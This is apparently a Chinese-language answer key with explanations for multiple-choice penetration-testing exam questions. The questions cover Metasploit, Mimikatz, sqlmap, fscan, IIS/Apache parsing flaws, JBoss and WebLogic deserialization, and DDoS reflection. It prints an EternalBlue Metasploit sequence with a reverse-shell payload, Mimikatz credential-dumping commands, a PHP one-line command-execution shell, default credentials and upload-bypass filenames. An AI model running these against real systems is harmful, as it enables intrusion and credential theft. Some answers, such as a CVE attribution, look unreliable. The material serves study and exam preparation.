
A. Auxiliary (信息收集、扫描)

B. Payload (攻击载荷,如反向Shell)

C. Exploits (漏洞利用代码)

❌ D. Listen(非独立模块,属于Payload配置)

📌 常用命令

bash复制 use exploit/windows/smb/ms17_010_eternalblue

set RHOST 192.168.1.1

set PAYLOAD windows/x64/meterpreter/reverse_tcp

exploit


11. PHP危险函数

A. system()

C. exec()

D. shell_exec()

❌ B. phpinfo()(信息泄露,不直接执行命令)

📌 防御措施

  • 禁用高危函数( disable_functions=system,exec )。
  • 使用安全函数(如 escapeshellarg() 过滤参数)。

12. SQLMap支持的数据库

A. Oracle

C. MySQL

D. MSSQL

❌ B. MongoDB(NoSQL注入需专用工具如NoSQLMap)

📌 示例命令

bash复制 sqlmap -u " --dbms=mysql

sqlmap -u " --dbms=oracle


7. Mimikatz功能

A. 获取账号密码 (从LSASS进程提取)

B. 哈希传递(Pass-the-Hash)

C. 票据传递(Pass-the-Ticket)

❌ D. 代理转发(需配合其他工具如Proxifier)

📌 经典命令

bash复制 mimikatz # privilege::debug

mimikatz # sekurlsa::logonpasswords


8. 命令执行函数

A. pcntl_exec()

C. popen()

D. passthru()

❌ B. phpinfo()(仅信息输出)

📌 风险示例

php复制 <?php

passthru($_GET['cmd']); // 直接执行用户输入命令

?>


SQL查询问题:数学最高分姓名

B. select name where math is (select max(math)...) (语法错误, is 用于NULL判断)

✅ 其他选项正确(A/C/D均等价, =in 匹配唯一值)

📌 解析

  • 错误原因IS 用于比较 NULL ,如 math IS NULL
  • 正确语法WHERE math = (SELECT MAX(math) ...)

33. 微警CMS存在哪些漏洞?(1.5分)

B. 低权限后台getshell

D. 1.8.2后台getshell

❌ A. 0.8后台任意文件删除(需具体漏洞公告验证)

❌ C. 0.7 SQL注入漏洞(未广泛证实)

📌 解析

微警CMS(微擎CMS)历史漏洞主要集中在后台权限管理缺陷:

  • 低权限后台getshell :低权限用户通过接口上传恶意文件或利用逻辑漏洞获取服务器权限。

  • 1.8.2版本后台getshell :管理后台存在未授权访问或文件上传校验不严,导致攻击者植入Webshell。

    其他选项需结合CVE编号验证,部分版本漏洞存在争议。


33. 以下关于CC攻击说法正确的是?(1.5分)

C. CC攻击需要借助代理进行

D. CC攻击难以获取目标机器的控制权

❌ A. CC攻击最早在国外大面积流行(起源于国内“挑战黑洞”攻击)

❌ B. CC攻击利用TCP协议缺陷(基于应用层HTTP请求耗尽资源)

📌 解析

  • CC攻击(Challenge Collapsar) :模拟大量合法请求(如HTTP GET/POST),耗尽服务器资源(CPU、带宽、连接数)。
  • 特点
    • 需通过代理或僵尸网络隐藏攻击源IP。
    • 仅导致服务拒绝,无法直接控制目标机器。

29. 在MySQL中,数据类型大致分为?(1.5分)

A. 浮点型(FLOAT、DOUBLE、DECIMAL)

B. 字符串(CHAR、VARCHAR、TEXT)

C. 整型(INTEGER、INT、BIGINT)

D. 日期/时间(DATETIME、DATE、TIMESTAMP)

📌 解析

MySQL数据类型分类:

  • 数值型INTFLOATDECIMAL (精确小数)。
  • 字符型CHAR (定长)、 VARCHAR (变长)、 BLOB / TEXT (大文本)。
  • 日期型DATE (年月日)、 TIME (时分秒)、 TIMESTAMP (时间戳)。
  • 其他ENUM (枚举)、 JSON (结构化数据)。

30. fscan如何指定密码来进行爆破?(1.5分)

C. fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt

❌ A. -pwd 参数需指定具体密码(非文件路径)

❌ B. -userf 仅指定用户名字典

❌ D. 缺少密码参数,语法错误

📌 解析

fscan常用参数:

  • -pwdf :指定密码字典文件路径(每行一个密码)。

  • -userf :指定用户名字典文件路径。

    示例: fscan -h 10.0.0.1/24 -userf users.txt -pwdf passwords.txt


31. 修改Apache的默认网页目录需要配置哪些参数?(1.5分)

B. Directory (目录权限配置)

D. DocumentRoot (主目录路径)

❌ A. sshd_config (SSH服务配置文件)

❌ C. logs (日志目录,非核心配置)

📌 解析

Apache配置示例( httpd.conf 或站点配置文件):

apache复制 DocumentRoot "/var/www/html"

<Directory "/var/www/html">

Options Indexes FollowSymLinks

AllowOverride All

Require all granted

</Directory>


27. 在Windows系统中,下列关于安全策略的功能特点哪些说法是正确的?(1.5分)

A. 本地安全策略设置分为账户策略、本地策略等5部分

B. 成员服务器的本地策略被域策略覆盖

C. 安全设置通过本地安全策略控制台管理

❌ D. 描述不完整(需结合组策略管理)

📌 解析

  • 本地安全策略 :路径为 secpol.msc ,管理密码复杂度、审计策略、用户权限分配等。
  • 组策略优先级 :域策略 > 站点策略 > 组织单元策略 > 本地策略。

28. JOnAS默认用户名密码有?(1.5分)

A. jadmin/jonas

C. jonas/jonas

❌ B. admin/123456(常见弱口令,非默认)

❌ D. tomcat/tomcat(Tomcat默认凭证)

📌 解析

JOnAS(Java Open Application Server)默认凭证:

  • jadmin/jonas :管理员账户。

  • jonas/jonas :普通用户账户。

    建议安装后立即修改默认密码。


24. 下列常用端口,可能用于反射放大DDoS攻击的有?(1.5分)

B. memcache 11211/udp

C. NTP 123/udp

❌ A. DNS 53/tcp(UDP协议更常用于反射)

❌ D. HTTPS 443/tcp(TCP协议无法放大流量)

📌 解析

  • Memcached :无认证UDP服务,单请求可触发数万倍响应(CVE-2018-11321)。

  • NTPmonlist 命令响应包放大效果显著。

    其他高危协议:SSDP(1900/udp)、SNMP(161/udp)。


25. 在自动更新的对话框中的选择项包括下列哪些?(1.5分)

A. 自动(推荐)

B. 下载更新,由用户决定何时安装

C. 仅通知可用更新

D. 关闭自动更新

📌 解析

Windows更新选项(截至2025年):

  1. 自动安装更新 :系统后台下载并安装。
  2. 下载但手动安装 :用户选择时间重启。
  3. 仅通知 :用户需主动下载。
  4. 禁用更新 :需通过组策略或注册表实现。

26. IIS6.x解析漏洞利用方式有哪些?(1.5分)

A. 文件名(如 test.asp;.jpg

D. 文件夹(如 /upload/test.asp/1.jpg

❌ B. 默认类型名(IIS6无此机制)

❌ C. 默认扩展名(与漏洞无关)

📌 解析

  • 分号截断test.asp;.jpg 被解析为ASP文件。

  • 目录解析/asp目录/1.jpg 被当作ASP执行。

    修复建议:禁用非必要脚本映射,升级至IIS7+。


22. Websphere Java反序列化(CVE-2015-7450)漏洞影响版本有?(1.5分)

A. 8.5版

B. 8.5.5传统和自由

C. 8.0版

D. 7.0版

📌 解析

CVE-2015-7450 :影响WebSphere Application Server 7.0、8.0、8.5及Liberty Profile。

  • 漏洞机制 :Apache Commons Collections库反序列化漏洞。
  • 修复方案 :升级至Fix Pack 8.5.5.9+或应用官方补丁。

23. JBoss反序列化漏洞说法正确的是?(1.5分)

C. JBoss4.x访问 /jbossmq-httpil/HTTPServerILServlet 存在漏洞

D. JBoss5.x/6.x访问 /invoker/readonly 返回500可能存在漏洞

❌ A. JMX Invoker漏洞需关闭 jmx-invoker-service.xml

❌ B. WLS Security漏洞属于WebLogic(非JBoss)

📌 解析

  • JBoss反序列化漏洞
    • 4.x版本/jbossmq-httpil/HTTPServerILServlet 未授权访问,可执行任意代码。

    • 5.x/6.x版本/invoker/readonly 接口反序列化漏洞(CVE-2017-12149)。

      修复建议:删除或限制访问高危接口,升级至EAP 7+。


20. 下面哪个是对SSRF的防御?(1.5分)

A. 限制IP(禁止内网IP请求)

B. 限制端口(仅允许80/443)

C. 过滤返回信息(避免敏感数据泄露)

❌ D. 过滤POST参数(SSRF通常通过URL触发)

📌 解析

SSRF防御策略

  • 协议白名单 :仅允许HTTP/HTTPS。
  • 目标限制 :禁止访问内网IP和非常用端口。
  • 响应过滤 :屏蔽错误信息中的内网拓扑数据。

21. 关于漏洞修复以下说法正确的是?(1.5分)

A. 高稳定性环境需综合评估修复优先级

B. 修复可能影响业务连续性

❌ C. 极高危漏洞必须修复(不可忽略)

❌ D. Linux无需频繁升级(仍需定期更新)

📌 解析

漏洞修复原则:

  • 风险评估 :结合CVSS评分、资产价值、利用可能性排序。
  • 测试验证 :生产环境需在测试环境验证补丁兼容性。
  • 备份回滚 :修复前备份系统,制定回滚方案。

17. 关于OpenSSL心脏出血漏洞修复说法正确的是?(1.5分)

C. 升级后需生成新密钥(原密钥可能泄露)

D. 升级至最新版本可解决

❌ A. 旧密钥可继续使用(存在被窃取风险)

❌ B. 用户需改密(漏洞泄露内存数据,非密码)

📌 解析

Heartbleed(CVE-2014-0160)修复步骤

  1. 升级OpenSSL至1.0.1g+或1.0.2+。
  2. 吊销旧证书并重新签发。
  3. 重启服务确保新版本生效。

18. IIS中间件文件上传漏洞利用方式有哪些?(1.5分)

A. 目录解析( a.asp/ 下任意文件解析为ASP)

D. 分号截断( test.asp;.jpg

❌ B. 路径后加 .php (IIS6不支持PHP解析)

❌ C. 路径前加 /php (无实际意义)

📌 解析

  • IIS6解析漏洞
    • 文件夹解析/asp_dir/1.jpg 被当作ASP执行。

    • 分号截断test.asp;.jpg 忽略分号后内容。

      修复方案:禁用非必要脚本映射,使用URL重写过滤异常请求。

39. WebLogic密码复杂度配置

A. 控制台修改“最小口令长度”

D. 依据 weblogic.system.minPasswordLen=8

📝 解析

  • 正确配置路径 :WebLogic管理控制台中,通过【安全领域】→【DefaultAuthenticator】→【提供程序特定】设置密码策略(如最小长度)。
  • 配置文件 :密码策略通常存储在 config.xml 或领域配置中,而非 weblogic.properties
  • 基线依据weblogic.system.minPasswordLen=8 是常见安全基线参数,需通过脚本或控制台生效。

30. 触发解析漏洞的操作

A. xxx.jpg%00.php (空字节截断)

B. xxx.jpg/1.php (路径解析)

C. xxx.asp;.jpg (分号截断,IIS 6.0)

D. test.php.php123 (畸形后缀,Apache多后缀解析)

📝 原理

  • 空字节截断 :利用 %00 截断后续字符(如 a.jpg%00.php 被解析为 .php )。
  • 路径解析 :Apache将 a.jpg/1.php 视为PHP文件执行。
  • 分号截断 :IIS 6.0将 a.asp;.jpg 解析为 .asp
  • 多后缀解析 :Apache可能将 a.php.jpg 解析为PHP文件。

27. MySQL 5.0以上与以下版本注入差异

C. 5.0以下无 information_schema ,需暴力跑表名

📝 关键区别

  • MySQL ≥5.0 :默认包含 information_schema 系统库,可直接查询数据库、表、列名。
  • MySQL <5.0 :无此系统库,需通过字典爆破或盲注猜测表名。
  • 其他选项 :多用户操作模式与版本无关,属干扰项。

28. Linux可读取的分区类型

A. ext3 (原生支持)

B. FAT16 (需 vfat 驱动)

C. FAT32 (同FAT16,需挂载)

D. NTFS (需 ntfs-3g 驱动)

📝 说明

  • ext3/4 :Linux默认文件系统,直接读写。
  • FAT/NTFS :需内核模块或第三方工具支持(如 ntfs-3g )。

23. Oracle物理组件

A. 控制文件

C. 日志文件

D. 数据文件

📝 物理结构

  • 控制文件 :存储数据库元数据(如数据文件位置)。
  • 日志文件 :记录事务变更(Redo Log)。
  • 数据文件 :存储实际数据(表、索引)。
  • 管理后台 :属逻辑组件(如Oracle Enterprise Manager)。